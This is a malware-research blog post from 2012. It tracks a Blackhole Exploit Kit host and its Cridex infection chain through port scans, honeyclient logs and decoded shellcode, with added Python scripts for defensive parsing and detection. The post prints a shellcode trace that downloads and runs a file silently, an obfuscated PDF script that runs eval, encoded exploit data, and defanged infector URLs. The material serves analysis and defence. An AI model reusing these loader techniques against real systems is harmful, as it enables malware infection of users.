Tuesday, September 18, 2012

Monitoring a Blackhole Exploit Kit's Services & Infectors (Target: 203.91.113.6)

Monitoring the activity of one Blackhole (in short: BHEK) host means spending days on it. I picked one confirmed BHEK host, 203.91.113.6, and stuck to it for about a week; this host is quite active as a malware infector, which is one of the reasons I picked it.
I think I was careful enough in monitoring it, so I don't think they even sensed being monitored, which gave me plenty of time to analyze it. Here is what I found...
  
Background

The spam email containing a malicious link to this host on Sept 5th is what made me start monitoring it. Maybe some of you still remember this spam:
From: HM Revenue & Customs [mailto:refund.request@hmrc.gov.uk]
To: xxxx
Sent: 05 September 2012 xx:xx (time was varied)
Subject: Tax Refund Alert - Action Required
How to complain, ask for a review or make an appeal
Review process update
Review process - the first 12 months. Find out more
Claim Your Tax Refund Online
We identified an error in the [link]
This spam actually infected users with Cridex. At that time the domains used were gdeounitrg.com and gsigallery.net. URLQuery data also shows a long list of reported malware infectors coming from this host; you can access it here--->>[CLICK]. From that list we can see the recent infector domains, as per below:
virtual-geocaching.net
cedarbuiltok.net
thebummwrap.net
afgreenwich.net
bode-sales.net
cat-mails.net
centennialfield.net
blue-lotusgrove.net
dushare.net
If you look at each report listed in URLQuery by date, you will see that this host never uses the same domain for more than 2 days (max). Since the URLs listed are landing pages, I assume an email malvertising scheme.

Services used

During the initial monitoring period I detected the services below:
21/tcp   open     ftp
22/tcp   open     ssh
23/tcp   open     telnet
80/tcp   open     http
111/tcp  open     rpcbind
135/tcp  open     msrpc
136/tcp  open     profile
137/tcp  open     netbios-ns
138/tcp  open     netbios-dgm
139/tcp  open     netbios-ssn
389/tcp  open     ldap
636/tcp  open     ldapssl
1025/tcp open     NFS-or-IIS
5000/tcp open     UPnP
5050/tcp open     mmcc
8009/tcp open     ajp13
8080/tcp open     http-proxy
A couple of days ago I realized it had filtered some of the previously open ports/services, and added some more too, which now looks like this:
21/tcp   open     ftp
22/tcp   open     ssh
23/tcp   open     telnet
80/tcp   open     http
111/tcp  open     rpcbind
135/tcp  filtered msrpc <-----1
136/tcp  filtered profile <-----1
137/tcp  filtered netbios-ns <-----1
138/tcp  filtered netbios-dgm <----1
139/tcp  filtered netbios-ssn <-----1
389/tcp  open     ldap
445/tcp  filtered microsoft-ds <-----1
636/tcp  open     ldapssl
1025/tcp filtered NFS-or-IIS <-------1
1337/tcp filtered waste
3001/tcp filtered nessusd  <-----2
3128/tcp filtered squid-http <-----3
5000/tcp filtered UPnP
5050/tcp open     mmcc
8009/tcp open     ajp13
8080/tcp open     http-proxy <---4
Legend:
1 = Windows services, never filtered previously
2 = Nessus scanner daemon
3 = Squid proxy is running
4 = HTTP web server
It filtered some TCP ports related to the Windows services. To make sure this is still the same Windows server as before, I re-checked its OS fingerprint every day:
Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW
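The day-to-day comparison of the two port tables above is easy to automate. The script below is an added example for this post, not the author's own tooling: it parses nmap normal-output port lines and reports which ports changed state, appeared, or vanished between two runs. The two scans are embedded as constructed strings copied from the tables above; in practice you would feed it each day's saved `nmap -oN` file. One caveat worth keeping in mind when reading the tables: without `-sV`, nmap's SERVICE column is a lookup in its nmap-services port-name table, so entries like "NFS-or-IIS" on 1025/tcp or "waste" on 1337/tcp name the port, not a daemon that was actually identified.

```python
"""Diff two nmap port tables to spot what an operator filtered or opened.

Added example (not the post author's code). SCAN_DAY1 and SCAN_LATER are the
two tables quoted in the post, pasted in as constructed strings.
"""
import re

# port/proto, state (open, filtered, closed, open|filtered, ...), service name, rest ignored
PORT_LINE = re.compile(r"^\s*(\d+)/(tcp|udp)\s+([\w|]+)\s+(\S+)")

SCAN_DAY1 = """\
21/tcp   open     ftp
22/tcp   open     ssh
23/tcp   open     telnet
80/tcp   open     http
111/tcp  open     rpcbind
135/tcp  open     msrpc
136/tcp  open     profile
137/tcp  open     netbios-ns
138/tcp  open     netbios-dgm
139/tcp  open     netbios-ssn
389/tcp  open     ldap
636/tcp  open     ldapssl
1025/tcp open     NFS-or-IIS
5000/tcp open     UPnP
5050/tcp open     mmcc
8009/tcp open     ajp13
8080/tcp open     http-proxy
"""

SCAN_LATER = """\
21/tcp   open     ftp
22/tcp   open     ssh
23/tcp   open     telnet
80/tcp   open     http
111/tcp  open     rpcbind
135/tcp  filtered msrpc <-----1
136/tcp  filtered profile <-----1
137/tcp  filtered netbios-ns <-----1
138/tcp  filtered netbios-dgm <----1
139/tcp  filtered netbios-ssn <-----1
389/tcp  open     ldap
445/tcp  filtered microsoft-ds <-----1
636/tcp  open     ldapssl
1025/tcp filtered NFS-or-IIS <-------1
1337/tcp filtered waste
3001/tcp filtered nessusd  <-----2
3128/tcp filtered squid-http <-----3
5000/tcp filtered UPnP
5050/tcp open     mmcc
8009/tcp open     ajp13
8080/tcp open     http-proxy <---4
"""


def parse_ports(text):
    """Map (port, proto) -> (state, service) for every port line in the table."""
    table = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service = m.groups()
            table[(int(port), proto)] = (state, service)
    return table


def diff_scans(old_text, new_text):
    """Return (changed, added, removed) between two scans of the same host."""
    old, new = parse_ports(old_text), parse_ports(new_text)
    changed = {k: (old[k][0], new[k][0]) for k in old if k in new and old[k][0] != new[k][0]}
    added = {k: new[k] for k in new if k not in old}
    removed = {k: old[k] for k in old if k not in new}
    return changed, added, removed


def report(old_text, new_text):
    """Human-readable change list, one line per port, sorted by port number."""
    changed, added, removed = diff_scans(old_text, new_text)
    lines = []
    for (port, proto), (was, now) in sorted(changed.items()):
        lines.append(f"{port}/{proto}: {was} -> {now}")
    for (port, proto), (state, service) in sorted(added.items()):
        lines.append(f"{port}/{proto}: new, {state} ({service})")
    for (port, proto), (state, service) in sorted(removed.items()):
        lines.append(f"{port}/{proto}: gone, was {state} ({service})")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SCAN_DAY1, SCAN_LATER)))
```

Run against the two tables it lists the seven Windows-related ports that went from open to filtered and the four ports (445, 1337, 3001, 3128) that newly appear as filtered; nothing disappeared. Keeping the daily scans and diffing them this way is what turns a week of watching into a timeline of the operator's hardening steps.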
What about the web services (ports 80 and 8080)? Let's see what happens on port 8080:
GET / HTTP/1.1
User-Agent: blah
Host: virtual-geocaching.net:8080
Accept: */*

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1 <---- here
Accept-Ranges: bytes
ETag: W/"7777-1279522786000"
Last-Modified: Mon, 19 Jul 2010 06:59:46 GMT
Content-Type: text/html
Content-Length: 7777
Date: Tue, 18 Sep 2012 08:48:01 GMT
While this is what happens on port 80:
GET / HTTP/1.1
User-Agent: blah
Host: virtual-geocaching.net
Accept: */*

HTTP/1.1 403 Forbidden
Server: nginx/1.3.3 <--- here
Date: Tue, 18 Sep 2012 08:51:49 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 202
Connection: close
So on TCP/8080 we see Tomcat (Apache-Coyote is Tomcat's HTTP connector) and on TCP/80 nginx. Now we see nginx, Tomcat, file sharing, telnet, SSH, and FTP servers. The filtered ports are Nessus, for port scanning, and a Squid proxy which I probed and found to be set outbound. I have seen some Blackhole hosts, but never a guarded one with heavy services running like this; moreover NFS and LDAP services are also running, which suggests the possibility of records or maybe C&C activity on it. OK, let's continue with what this BHEK actually does now.

Infector scheme and malwares

Consulting my EK mentor @kafein, who kindly guides me in EK infection cases, this looked like an old version of BHEK (1.2.5); since there are some changes, it is possible it was upgraded to the latest BHEK v2, so I used a tool on a FreeBSD box to check the infector scheme. We picked the latest infector structure from urlQuery:
virtual-geocaching.net/main.php?page=7de3f5c4200c896e
And this is what I fetched as samples; all of this evil mess is what a user gets by clicking the single infector URL above. File details (name, MD5, size in bytes) are as follows:
AcroPDF.PDF                    50583375d345fb7a294e26094601699a   18406
field.swf                      d41d8cd98f00b204e9800998ecf8427e       0
Gam.jar                        ab4af9072132f170024a9072e0288459   32171
main.php@page=7de3f5c4200c896e de277f4802b1b59bb2d0f2cafb3137a3   69023
shellcode.sc                   ac157a90724aec74a1de6e0a20d4db0d     466
wpbt0.dll/e88d779.exe          3158bc97bf424fcd905caa22b29767b9  119143
These come through the following URLs, redirected from the infector:
/main.php?page=7de3f5c4200c896e <-- JS/Obfs infector (landing page)
/Gam.jar   <----- Java exploit CVE-2012-1723/CVE-2012-4681 w/ shellcode
/data/ap2.php  <---- PDF malware Pdfka/EXP with shellcode
/w.php?f=80f39&e=1 <---- payload EXE (Troj/Cridex, dropped by the JS/HTML shellcode)
/w.php?f=80f39&e=2 <----- payload EXE (Troj/Cridex, dropped by the PDF)
/data/hhcp.php?c=80f39  <---- 0 bytes (link for the SWF)
/data/field.swf <-- 0 bytes, supposed to be Flash/Shockwave
/w.php?f=80f39&e=4 <--- URL embedded in the PDF shellcode
The point of this scheme is to infect the user with Trojan/Cridex. The infector scheme is as follows: the landing page is HTML containing obfuscated JS code; a neutralized sample is here---->>[PASTEBIN]. The code deobfuscates to this---->>[PASTEBIN]. There you can see the BHEK plugin-detection code that exploits the browser through whichever vulnerable component it finds, along the routes below:
Java Object (Gam.jar) --> shellcode1 --> Troj/Cridex(PE)
PDF File (AcroPDF.PDF)--> shellcode2 --> Troj/Cridex(PE)
DOMDocs Msxml2.XMLHTTP --------> Troj/Cridex(PE)
Java Exploit javaplugin.191_40 --> shellcode1 --> Troj/Cridex(PE)
JavaWebStart.isInstalled -->shellcode1 --> Troj/Cridex(PE)
SWF Exploit (field.swf) --> null (at least at this moment..)
Landing page itself/HTML --> shellcode1 --> Troj/Cridex(PE)
The above scheme was recorded in the log on my FreeBSD box, below:
[h00p] URL: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e (Status: 200, Referrer: None)
[Navigator URL Translation] Gam.jar -->  h00p://virtual-geocaching.net/Gam.jar
[h00p] URL: h00p://virtual-geocaching.net/Gam.jar (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving applet Gam.jar

[Window] Eval argument length > 64 (33842)
ActiveXObject: msxml2.xmlhttp
ActiveXObject: acropdf.pdf
Unknown ActiveX Object: shockwaveflash.shockwaveflash.15
Unknown ActiveX Object: shockwaveflash.shockwaveflash.14
Unknown ActiveX Object: shockwaveflash.shockwaveflash.13
Unknown ActiveX Object: shockwaveflash.shockwaveflash.12
Unknown ActiveX Object: shockwaveflash.shockwaveflash.11
ActiveXObject: shockwaveflash.shockwaveflash.10


Unknown ActiveX Object: javawebstart.isinstalled.1.9.1.0
Unknown ActiveX Object: javawebstart.isinstalled.1.9.0.0
Unknown ActiveX Object: javawebstart.isinstalled.1.8.1.0
Unknown ActiveX Object: javawebstart.isinstalled.1.8.0.0
ActiveXObject: javawebstart.isinstalled.1.7.1.0
Unknown ActiveX Object: javaplugin.171_40
Unknown ActiveX Object: javaplugin.171_39
Unknown ActiveX Object: javaplugin.171_38
Unknown ActiveX Object: javaplugin.171_37
Unknown ActiveX Object: javaplugin.171_36
Unknown ActiveX Object: javaplugin.171_35
Unknown ActiveX Object: javaplugin.171_34
Unknown ActiveX Object: javaplugin.171_33
Unknown ActiveX Object: javaplugin.171_32
Unknown ActiveX Object: javaplugin.171_31
ActiveXObject: javaplugin.171_30
ActiveXObject: javawebstart.isinstalled.1.7.1.0
[Navigator URL Translation] ./data/ap2.php -->  h00p://virtual-geocaching.net/data/ap2.php
[h00p] URL: h00p://virtual-geocaching.net/data/ap2.php (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
[Navigator URL Translation] ./data/hhcp.php?c=80f39 -->  h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[h00p] URL: h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
ActiveXObject: D27CDB6E-AE6D-11CF-96B8-444553540000
[h00p] URL: h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (MD5: 3158bc97bf424fcd905caa22b29767b9)

[Navigator URL Translation] ./data/ap2.php -->  h00p://virtual-geocaching.net/data/ap2.php
[iframe redirection] h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e -> h00p://virtual-geocaching.net/data/ap2.php
[h00p] URL: h00p://virtual-geocaching.net/data/ap2.php (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)

[Navigator URL Translation] ./data/hhcp.php?c=80f39 -->  h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[iframe redirection] h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e -> h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[h00p] URL: h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)

[Navigator URL Translation] data/field.swf -->  h00p://virtual-geocaching.net/data/field.swf
[h00p] URL: h00p://virtual-geocaching.net/data/field.swf (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at data/field.swf (MD5: d41d8cd98f00b204e9800998ecf8427e)
[Navigator URL Translation] data/field.swf -->  h00p://virtual-geocaching.net/data/field.swf
[h00p] URL: h00p://virtual-geocaching.net/data/field.swf (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
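The route list and the honeyclient log above can be turned back into a structured infection chain with a few regular expressions. The script below is an added example (not the post author's tooling and not the honeyclient's own code): it parses Thug-style log lines for fetched URLs, saved content and ActiveX plugin probes, labels each URL with its BHEK stage using the URL patterns seen on this host, recovers the exploit ID from `w.php?f=...&e=N`, and flags downloads whose MD5 is that of an empty file. `LOG` is a constructed excerpt made of lines quoted in this post (URLs defanged as h00p, as the post does); the stage patterns are specific to the paths this host used and would need adjusting for another kit instance.

```python
"""Rebuild a BHEK infection chain from a honeyclient (Thug-style) log.

Added example, not part of the original post. LOG is a constructed excerpt
assembled from the log lines quoted in the post; URLs stay defanged (h00p).
"""
import hashlib
import re
from urllib.parse import parse_qs, urlparse

LOG = """\
[h00p] URL: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e (Status: 200, Referrer: None)
[Navigator URL Translation] Gam.jar -->  h00p://virtual-geocaching.net/Gam.jar
[h00p] URL: h00p://virtual-geocaching.net/Gam.jar (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving applet Gam.jar
ActiveXObject: acropdf.pdf
Unknown ActiveX Object: javaplugin.171_40
ActiveXObject: javaplugin.171_30
[h00p] URL: h00p://virtual-geocaching.net/data/ap2.php (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
[h00p] URL: h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
[h00p] URL: h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (MD5: 3158bc97bf424fcd905caa22b29767b9)
[h00p] URL: h00p://virtual-geocaching.net/data/field.swf (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at data/field.swf (MD5: d41d8cd98f00b204e9800998ecf8427e)
"""

URL_LINE = re.compile(r"^\[h00p\] URL: (\S+) \(Status: (\d+), Referrer: (\S+)\)$")
SAVE_LINE = re.compile(r"^Saving remote content at (\S+) \(MD5: ([0-9a-f]{32})\)$")
PROBE_LINE = re.compile(r"^(Unknown ActiveX Object|ActiveXObject): (\S+)$")

# Stage patterns, matched against path+query; taken from the URLs seen on this host.
STAGES = [
    ("landing", re.compile(r"^/main\.php\?page=[0-9a-f]{16}$")),
    ("java-exploit", re.compile(r"\.jar$")),
    ("pdf-exploit", re.compile(r"^/data/ap2\.php$")),
    ("swf-loader", re.compile(r"^/data/hhcp\.php\?c=[0-9a-f]+$")),
    ("swf-exploit", re.compile(r"\.swf$")),
    ("payload", re.compile(r"^/w\.php\?f=[0-9a-f]+&e=\d+$")),
]

EMPTY_MD5 = hashlib.md5(b"").hexdigest()  # d41d8cd98f00b204e9800998ecf8427e


def classify(url):
    """Name the BHEK stage a URL belongs to, or 'unknown'."""
    p = urlparse(url)
    target = p.path + ("?" + p.query if p.query else "")
    for name, rx in STAGES:
        if rx.search(target):
            return name
    return "unknown"


def parse_log(text):
    """Return (events, saved, found_plugins, missing_plugins).

    events: fetched URLs in order with status, referrer and stage
    saved:  download target -> MD5 as the honeyclient reported it
    """
    events, saved, found, missing = [], {}, set(), set()
    for line in text.splitlines():
        m = URL_LINE.match(line)
        if m:
            url, status, ref = m.groups()
            events.append({"url": url, "status": int(status),
                           "referrer": None if ref == "None" else ref,
                           "stage": classify(url)})
            continue
        m = SAVE_LINE.match(line)
        if m:
            saved[m.group(1)] = m.group(2)
            continue
        m = PROBE_LINE.match(line)
        if m:
            (found if m.group(1) == "ActiveXObject" else missing).add(m.group(2))
    return events, saved, found, missing


def exploit_ids(events):
    """BHEK's w.php?f=<session>&e=<n>: 'e' records which exploit fetched the payload."""
    return {parse_qs(urlparse(e["url"]).query)["e"][0]
            for e in events if e["stage"] == "payload"}


def empty_downloads(saved):
    """Saved files whose MD5 is the digest of zero bytes (dead SWF slots, etc.)."""
    return sorted(k for k, md5 in saved.items() if md5 == EMPTY_MD5)


if __name__ == "__main__":
    ev, sv, found, missing = parse_log(LOG)
    for e in ev:
        print(f"{e['stage']:13} {e['status']} {e['url']}")
    print("exploit ids:", exploit_ids(ev), "empty:", empty_downloads(sv))
```

On the excerpt every non-landing fetch carries the landing page as its referrer, the only payload fetch has `e=1`, and the 0-byte `field.swf` is caught by the empty-file hash rather than by eyeballing sizes.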
About the shellcode: we found 2 shellcodes, one coded in the landing page and the other coded in the PDF file, call them shellcode 1 and 2. Shellcode 1, decoded as an API trace:
BOOL VirtualProtectEx (
     HANDLE = 0x298dda60 => none;
     LPCVOID = 0x298dda70 => none;
     DWORD dwSize = 255;
     DWORD flNewProtect = 64;
     PDWORD lpflOldProtect = 64;
) =  0x1;
HMODULE LoadLibraryA (
     LPCTSTR = 0x298ddad0 => = "urlmon"; //urlmon.dll used
) =  0x7df20000;
DWORD GetTempPathA (
     DWORD nBufferLength = 248;
     LPTSTR = 0x298ddb00 => 
           = "c:\tmp\";
) =  0x7;
HRESULT URLDownloadToFile ( //downloads...
     LPUNKNOWN = 0x28621a40 =>  none;
     LPCTSTR = 0x28621a48 => 
           = "h00p://virtual-geocaching.net/w.php?f=80f39&e=1";
     LPCTSTR = 0x298ddb50 => 
           = "c:\tmp\wpbt0.dll";  // saved here...
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0x0;
UINT WINAPI WinExec (       // execute it here..
     LPCSTR = 0x298ddb70 => 
           = "c:\tmp\wpbt0.dll";
     UINT uCmdShow = 0;
) =  0x20;
UINT WINAPI WinExec (
     LPCSTR = 0x298ddbb0 => 
           = "regsvr32 -s c:\tmp\wpbt0.dll"; //register it...
     UINT uCmdShow = 0;
) =  0x20;
BOOL TerminateThread (
     HANDLE hThread = -2;    // exit...
     DWORD dwExitCode = 0;
) =  0x0;
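The trace above is the whole drop-and-run step in two API calls: the file lands in the temp directory, is executed directly, and is then handed to `regsvr32 -s`. That sequence is a cheap thing to watch for in process-creation telemetry. The script below is an added example, not from the post: a small triage rule over process command lines that tags silent `regsvr32` registrations of a DLL under a temp directory, and images with a `.dll` extension launched as programs. The rule names are made up for illustration; of the sample command lines, only the two lifted from the shellcode trace are real, the rest are constructed to show the rule staying quiet on ordinary launches.

```python
"""Tag process launches that match the drop-and-run pattern of shellcode 1.

Added example (not the post author's code). Rule names are illustrative;
SAMPLES mixes the two command lines from the shellcode trace with constructed
benign ones.
"""
import re

_ARG = re.compile(r'"([^"]*)"|(\S+)')

SAMPLES = [
    r"c:\tmp\wpbt0.dll",                                   # from the trace (WinExec)
    r"regsvr32 -s c:\tmp\wpbt0.dll",                       # from the trace (WinExec)
    r'regsvr32 /s "C:\Program Files\Vendor\x.dll"',        # constructed: normal install
    r"C:\Windows\System32\notepad.exe",                    # constructed: benign
    r"%TEMP%\installer.exe",                               # constructed: only temp-exec
]


def split_cmdline(cmdline):
    """Windows-style tokenizer: a double-quoted path with spaces stays one argument."""
    return [quoted or bare for quoted, bare in _ARG.findall(cmdline)]


def in_temp_dir(path):
    """True when a directory component is tmp/temp or the path starts with %TEMP%/%TMP%."""
    p = path.lower().replace("/", "\\")
    if p.startswith(("%temp%", "%tmp%")):
        return True
    return any(part in ("tmp", "temp") for part in p.split("\\")[:-1])


def triage(cmdline):
    """Return the list of rule names a command line triggers (empty when clean)."""
    tags = []
    args = split_cmdline(cmdline)
    if not args:
        return tags
    image = args[0].lower().rsplit("\\", 1)[-1]
    if image in ("regsvr32", "regsvr32.exe"):
        switches = {a.lower() for a in args[1:] if a[:1] in ("/", "-")}
        targets = [a for a in args[1:] if a[:1] not in ("/", "-")]
        # silent registration (/s) of something living under a temp directory
        if switches & {"/s", "-s"} and any(in_temp_dir(t) for t in targets):
            tags.append("regsvr32-silent-temp-dll")
    else:
        if image.endswith(".dll"):          # a "DLL" run as a program is really a PE EXE
            tags.append("dll-launched-as-program")
        if in_temp_dir(args[0]):
            tags.append("exec-from-temp")
    return tags


def scan(cmdlines):
    """(command line, tags) for every line that triggers at least one rule."""
    hits = []
    for c in cmdlines:
        t = triage(c)
        if t:
            hits.append((c, t))
    return hits


if __name__ == "__main__":
    for cmd, tags in scan(SAMPLES):
        print(tags, cmd)
```

The `exec-from-temp` tag on its own is noisy (installers do it), which is why the two trace lines are the ones worth alerting on: a `.dll` launched as a program, followed by the same path given to `regsvr32 -s`, from the same temp directory.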
The other one, shellcode 2, is very similar but aims at a different download URL:
68 74 74 70 3A 2F 2F 76 69 72 74 75 61 6C 2D 67 65 
6F 63 61 63 68 69 6E 67 2E 6E 65 74 2F 77 2E 70 68 
70 3F 66 3D 38 30 66 33 39 26 65 3D 34 00 00
Means: "h00p://virtual-geocaching.net/w.php?f=80f39&e=4"
For the PDF infector, most scanners cannot detect the evil script written in it, below:
<xfa:script contentType='application/x-javascript'>
with(event){
e=target["eval"];
if((app.addMenuItem+"").indexOf("Me"+"nuItem")!=-1){a=target.subject;}
}
a=a.split(".");
s="";
z=a;
for(i in a){
zz=i;
}
for(i=0;i<zz;i++){
 s+=String.fromCharCode(-33+1*z[i]);
}
e(""+s);
</xfa:script>
While the Subject field contains the exploit and shellcode:
<</Subject(130.145.145.79.130.141.134.147.149.94.134
77.65.133.133.133.77.65.134.134.134.77.65.135.135.13 //exploit
92.151.130.147.65.128.141.82.94.67.85.132.83.81.87.8
1.81.81.81.81.81.81.81.81.81.81.81.81.82.83.84.90.89
.92.80.136.77.72.72.74.92.151.130.147.65.128.141.83.
1.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81
141.130.132.134.73.80.92.80.136.77.72.72.74.92.128.1
  :
snip
  :
CreationDate(66;83;e4;fc;fc;85;e4; //shellcode
;08;c1;cb;0d;03;da;40;eb;f1;3b;1f;
;05;ff;e3;68;6f;6e;00;00;68;75;72;
;c1;04;30;88;44;1d;04;41;51;6a;00;...blah
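Three small encodings appear in this section: the space-separated hex dump of shellcode 2, the `;`-separated hex bytes of the shellcode in CreationDate, and the XFA script's Subject encoding, where the string is split on `.` and each number minus 33 is a character code. The script below is an added example, not the author's tooling, that decodes all three. The sample inputs are exactly the fragments quoted above; Subject and CreationDate are only the first visible pieces, so their decoded output is a prefix of the real thing. It also reproduces a quirk of the XFA loop: `zz` is set to the last index and the loop runs while `i<zz`, so the script silently drops the final element of the Subject array.

```python
"""Decoders for the PDF dropper's string encodings and the shellcode 2 dump.

Added example (not the post author's code). The three sample strings are the
fragments quoted in the post.
"""
import re

SHELLCODE2_DUMP = """\
68 74 74 70 3A 2F 2F 76 69 72 74 75 61 6C 2D 67 65
6F 63 61 63 68 69 6E 67 2E 6E 65 74 2F 77 2E 70 68
70 3F 66 3D 38 30 66 33 39 26 65 3D 34 00 00"""

SUBJECT_FRAGMENT = "130.145.145.79.130.141.134.147.149.94.134"   # first line of /Subject

CREATIONDATE_FRAGMENT = ";05;ff;e3;68;6f;6e;00;00;68;75;72;"        # one line of CreationDate


def hex_tokens_to_bytes(blob):
    """Keep every separator-delimited two-hex-digit token; accepts ' ' or ';' separators."""
    return bytes(int(t, 16) for t in re.split(r"[^0-9A-Fa-f]+", blob) if len(t) == 2)


def c_string(data):
    """ASCII up to the first NUL, the way the shellcode's string is consumed."""
    return data.split(b"\0", 1)[0].decode("ascii")


def decode_xfa_subject(subject, faithful=True):
    """Mirror the XFA script: split on '.', char = int(n) - 33.

    faithful=True reproduces the script's loop bound (i < last index), which
    drops the final element; faithful=False decodes every element.
    """
    parts = [p for p in subject.split(".") if p]
    if faithful:
        parts = parts[:-1]
    return "".join(chr(int(p) - 33) for p in parts)


def push_immediates(code):
    """Heuristic: collect the 4-byte immediates of 'push imm32' (opcode 0x68).

    Shellcode commonly builds strings such as a DLL name on the stack this way,
    one dword at a time in reverse order. A bare 0x68 inside data is a false hit.
    """
    out, i = [], 0
    while i < len(code):
        if code[i] == 0x68 and i + 5 <= len(code):
            out.append(bytes(code[i + 1:i + 5]))
            i += 5
        else:
            i += 1
    return out


if __name__ == "__main__":
    print(c_string(hex_tokens_to_bytes(SHELLCODE2_DUMP)))
    print(repr(decode_xfa_subject(SUBJECT_FRAGMENT)), repr(decode_xfa_subject(SUBJECT_FRAGMENT, False)))
    print(push_immediates(hex_tokens_to_bytes(CREATIONDATE_FRAGMENT)))
```

The shellcode 2 dump decodes to the `w.php?f=80f39&e=4` URL given in the post, the first Subject line to `app.alert=e` (or `app.alert=` with the script's off-by-one), and the CreationDate fragment contains `68 6f 6e 00 00` followed by `68 75 72`, i.e. `push "on\0\0"` and the start of a second push beginning `ur`, consistent with the string `urlmon` being built on the stack, the same library shellcode 1 loads with LoadLibraryA.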
The payload itself is the PE file of Trojan/Cridex, with the analysis below:
Sample's MD5 3158bc97bf424fcd905caa22b29767b9

0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 04 00 1A 64 57 50 00 00 00 00 PE..L....dWP....
0090 00 00 00 00 E0 00 0F 01 0B 01 02 32 00 4A 00 00 ...........2.J..

Compile Time: 2012-09-18 02:55:38
CRC Fail: Claimed:  0 Actual:  130407
Packer: PureBasic 4.x -> Neil Hodgson 
Sections:
   .code 0x1000 0x24cf 9728
   .text 0x4000 0x23c8 9216
   .rdata 0x7000 0x10 512 
   .data 0x8000 0xa8c 1536

Drops:
%Appdata%\kb00085031.exe (payload)
%Temp%\exp1.tmp
%temp%\exp1.tmp.bat

Collects information:
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (TransparentEnabled)
HKLM\System\CurrentControlSet\Control\Terminal Server (TSUserEnabled)

At the time I got this, only 3 AV products detected it:
Symantec                 : W32.Cridex
McAfee-GW-Edition        : Heuristic.BehavesLike.Win32.Downloader.A
Comodo                   : TrojWare.Win32.Trojan.Agent.Gen
I uploaded the samples to VirusTotal to check/monitor the recent detection ratio:
So the moral of the story is: with BHEK infector domains lasting at most 2 days, landing pages changing per click on BHEK2 and hourly on the previous version, and the operators starting to use network tools for protection and C&C deployment, we have a strong opponent that we mustn't ignore.

#MalwareMustDie!